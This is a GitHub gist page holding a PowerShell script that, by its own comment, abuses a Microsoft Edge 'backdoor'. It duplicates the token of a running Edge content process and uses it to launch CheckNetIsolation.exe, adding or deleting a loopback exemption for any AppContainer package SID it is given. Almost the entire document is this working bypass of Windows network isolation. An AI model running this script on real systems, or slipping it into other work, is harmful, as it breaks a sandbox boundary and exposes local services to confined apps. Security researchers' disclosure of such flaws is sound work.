Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
# Add an arbitrary loopback exemption by abusing the Microsoft Edge backdoor.
param(
[Parameter(Mandatory)]
[string]$Sid,
[switch]$Delete
)
Import-Module NtObjectManager
$token = Use-NtObject($ps = Get-NtProcess -Name 'MicrosoftEdgeCP.exe') {
$p = $ps | Select-Object -First 1
if ($null -eq $p) {
Write-Host "Microsoft Edge must be running"
exit
}
Get-NtToken -Primary -Process $p -Duplicate -ImpersonationLevel Impersonation
}
Use-NtObject($token) {
if ($Delete) {
$cmd = "-d"
} else {
$cmd = "-a"
}
Use-NtObject($proc = New-Win32Process "CheckNetIsolation.exe LoopbackExempt $cmd -p=$Sid" -CreationFlags Suspended, NewConsole) {
$proc.Thread.SetImpersonationToken($token)
$proc.Process.Resume()
$proc.Process.Wait() | Out-Null
$exitcode = $proc.Process.ExitStatus
if ($exitcode -ne 0) {
Write-Host "Error adding loopback exemption (exitcode: $exitcode)"
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.